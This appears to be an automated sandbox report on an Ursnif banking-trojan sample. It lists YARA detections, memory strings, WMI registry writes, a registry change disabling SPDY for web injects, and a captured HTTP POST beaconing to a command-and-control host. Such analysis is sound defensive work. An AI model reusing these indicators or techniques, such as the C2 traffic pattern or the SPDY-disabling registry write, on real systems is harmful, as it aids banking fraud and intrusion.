Source: RuntimeBroker.exe, 0000002E.00000002.1187598445.000001B4FB0D0000.00000004.00000001.sdmp String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"" equals www.facebook.com (Facebook)
Source: RuntimeBroker.exe, 0000002E.00000002.1187598445.000001B4FB0D0000.00000004.00000001.sdmp String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"" equals www.twitter.com (Twitter)
Source: RuntimeBroker.exe, 0000002E.00000000.997126395.000001B4FB0C4000.00000004.00000001.sdmp String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"uired":false}" equals www.facebook.com (Facebook)
Source: RuntimeBroker.exe, 0000002E.00000000.997126395.000001B4FB0C4000.00000004.00000001.sdmp String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"uired":false}" equals www.twitter.com (Twitter)
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: Find us: www.facebook.com/HiddenCityGame equals www.facebook.com (Facebook)
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: Follow us: www.twitter.com/g5games equals www.twitter.com (Twitter)
Source: RuntimeBroker.exe, 0000002E.00000000.997237662.000001B4FB11D000.00000004.00000001.sdmp String found in binary or memory: Like us on Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: Watch us: www.youtube.com/g5enter equals www.youtube.com (Youtube)
Source: unknown HTTP traffic detected: POST /oFicZj5usGm_2B0NL9gZLV/ZUmxvOk6Hl7SJ/EDK5fPOS/8bJn0oEKBXyaI_2FgFLHjIr/vR9EgPr9iZ/BsHMBlv9QxRTJNREz/mACP3yGg7skY/_2FdZEJn_2F/IV2mBc0GG_2FvT/53lPOvidBB1fn_2FI5kxG/suo5_2BB8niHf2Ry/rgnjnl9X_2F6HZr/tIOdn9dPOC7f1v8Cp_/2FP4dNfA6/YXJeUCPB5E1QadP6XZ0Z/70c_2FO_2BuW1MJ1FGY/r27cnguDBgf94rw_2FDi4i/aJyUeDcmN8xPq/7e51fVNw/PYHU8eZ8MJvwfaAYDz_2Fvf/Qi7bVln3AU/Hyoo0rU5uWfSrP9FI8hAt/b HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Content-Length: 2
Host: art.microsoftsofymicrosoftsoft.at

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
Source: Yara match File source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 0_2_00DD3FAB

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B2274 0_2_6E4B2274
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD2654 0_2_00DD2654
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD7E30 0_2_00DD7E30
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD4FA7 0_2_00DD4FA7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04572C07 0_2_04572C07
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04572499 0_2_04572499
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04565518 0_2_04565518
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456AD2E 0_2_0456AD2E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457C5F4 0_2_0457C5F4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04574658 0_2_04574658
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456279B 0_2_0456279B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_045788BB 0_2_045788BB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456E9BD 0_2_0456E9BD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04564AFE 0_2_04564AFE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_045852A0 0_2_045852A0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04582339 0_2_04582339
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB2499 3_2_04BB2499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB2C07 3_2_04BB2C07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BBC5F4 3_2_04BBC5F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BAAD2E 3_2_04BAAD2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA5518 3_2_04BA5518
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB4658 3_2_04BB4658
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA279B 3_2_04BA279B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB88BB 3_2_04BB88BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BAE9BD 3_2_04BAE9BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BC52A0 3_2_04BC52A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA4AFE 3_2_04BA4AFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BC2339 3_2_04BC2339
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A77E30 5_2_04A77E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A72654 5_2_04A72654
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A74FA7 5_2_04A74FA7
Source: C:\Windows\System32\control.exe Code function: 34_2_0093F2F0 34_2_0093F2F0
Source: C:\Windows\System32\control.exe Code function: 34_2_0093B530 34_2_0093B530
Source: C:\Windows\System32\control.exe Code function: 34_2_0093179C 34_2_0093179C
Source: C:\Windows\System32\control.exe Code function: 34_2_0094508C 34_2_0094508C
Source: C:\Windows\System32\control.exe Code function: 34_2_009340B4 34_2_009340B4
Source: C:\Windows\System32\control.exe Code function: 34_2_0094E0CF 34_2_0094E0CF
Source: C:\Windows\System32\control.exe Code function: 34_2_00923804 34_2_00923804
Source: C:\Windows\System32\control.exe Code function: 34_2_0092E008 34_2_0092E008
Source: C:\Windows\System32\control.exe Code function: 34_2_00937834 34_2_00937834
Source: C:\Windows\System32\control.exe Code function: 34_2_0094C874 34_2_0094C874
Source: C:\Windows\System32\control.exe Code function: 34_2_00929074 34_2_00929074
Source: C:\Windows\System32\control.exe Code function: 34_2_00933074 34_2_00933074
Source: C:\Windows\System32\control.exe Code function: 34_2_00944988 34_2_00944988
Source: C:\Windows\System32\control.exe Code function: 34_2_009459A8 34_2_009459A8
Source: C:\Windows\System32\control.exe Code function: 34_2_0093D9AC 34_2_0093D9AC
Source: C:\Windows\System32\control.exe Code function: 34_2_0093C1D4 34_2_0093C1D4
Source: C:\Windows\System32\control.exe Code function: 34_2_0092B1D8 34_2_0092B1D8
Source: C:\Windows\System32\control.exe Code function: 34_2_0093C9F0 34_2_0093C9F0
Source: C:\Windows\System32\control.exe Code function: 34_2_0093D150 34_2_0093D150
Source: C:\Windows\System32\control.exe Code function: 34_2_0094D2DC 34_2_0094D2DC
Source: C:\Windows\System32\control.exe Code function: 34_2_009432EC 34_2_009432EC
Source: C:\Windows\System32\control.exe Code function: 34_2_00938218 34_2_00938218
Source: C:\Windows\System32\control.exe Code function: 34_2_00937278 34_2_00937278
Source: C:\Windows\System32\control.exe Code function: 34_2_0094AA6C 34_2_0094AA6C
Source: C:\Windows\System32\control.exe Code function: 34_2_00926A68 34_2_00926A68
Source: C:\Windows\System32\control.exe Code function: 34_2_00939268 34_2_00939268
Source: C:\Windows\System32\control.exe Code function: 34_2_0094EB10 34_2_0094EB10
Source: C:\Windows\System32\control.exe Code function: 34_2_00936B1C 34_2_00936B1C
Source: C:\Windows\System32\control.exe Code function: 34_2_00922B74 34_2_00922B74
Source: C:\Windows\System32\control.exe Code function: 34_2_009464F4 34_2_009464F4
Source: C:\Windows\System32\control.exe Code function: 34_2_00933C24 34_2_00933C24
Source: C:\Windows\System32\control.exe Code function: 34_2_00930474 34_2_00930474
Source: C:\Windows\System32\control.exe Code function: 34_2_0093ED94 34_2_0093ED94
Source: C:\Windows\System32\control.exe Code function: 34_2_0094DD9C 34_2_0094DD9C
Source: C:\Windows\System32\control.exe Code function: 34_2_009385CC 34_2_009385CC
